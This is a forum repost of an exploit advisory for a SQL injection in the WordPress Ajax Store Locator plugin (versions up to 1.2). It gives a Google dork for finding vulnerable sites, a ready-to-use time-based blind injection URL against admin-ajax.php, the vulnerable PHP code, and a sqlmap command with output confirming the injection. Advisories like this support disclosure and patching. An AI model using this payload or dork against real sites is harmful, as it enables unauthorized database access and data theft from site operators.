Jump to content
KhiZaRix

WordPress Ajax Store Locator 1.2 SQL Injection

Recommended Posts

Posted

######################

# Exploit Title : Wordpress Ajax Store Locator <= 1.2 SQL Injection Vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : WordPress - Ajax Store Locator - Wordpress | CodeCanyon

# Software Link : Premium

# Dork Google: inurl:ajax-store-locator

# index of ajax-store-locator

# Date : 2015-03-29

# Tested on : Windows 7 / Mozilla Firefox

# Linux / Mozilla Firefox

######################

# Info:

The "sl_dal_searchlocation_cbf" ajax function is affected from SQL Injection vulnerability

"StoreLocation" var is not sanitized

# PoC Exploit:

http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

StoreLocation's value must contain "~" delimiter

$storeLoc = $_REQUEST["StoreLocation"];

...

...

$qryVal = explode("~", $storeLoc);

$sql_query = "SELECT a.*,b.*, 0 as ......... LEFT JOIN `$sl_tb_pluginset` as b ON (1=1) WHERE a.id=$qryVal[1]"

# PoC sqlmap:

sqlmap -u "http://TARGET/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1" -p StoreLocation --dbms mysql

[18:24:11] [iNFO] GET parameter 'StoreLocation' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[18:24:18] [iNFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

[18:24:18] [iNFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[18:24:24] [iNFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[18:24:29] [iNFO] checking if the injection point on GET parameter 'StoreLocation' is a false positive

GET parameter 'StoreLocation' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

sqlmap identified the following injection points with a total of 89 HTTP(s) requests:

---

Parameter: StoreLocation (GET)

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

Payload: action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(5)))LCKZ)

---

[18:29:48] [iNFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 5.10

web application technology: PHP 5.3.3, Apache 2.2.3

back-end DBMS: MySQL 5.0.12

#####################

Discovered By : Claudio Viviani

HomeLab IT - Virtualization, Security, Linux Blog - Virtualization, Security, Linux Blog

archive_exploit Archives - HomeLab IT - Virtualization, Security, Linux Blog (Full HomelabIT Archive Exploit)

F.F.H.D - Free Fuzzy Hashes Database (Free Fuzzy Hashes Database)

info@homelab.it

homelabit@protonmail.ch

https://www.facebook.com/homelabit

https://twitter.com/homelabit

https://plus.google.com/+HomelabIt1/

https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################

Source: http://packetstorm.wowhacker.com/1504-exploits/wpajaxstorelocator-sql.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...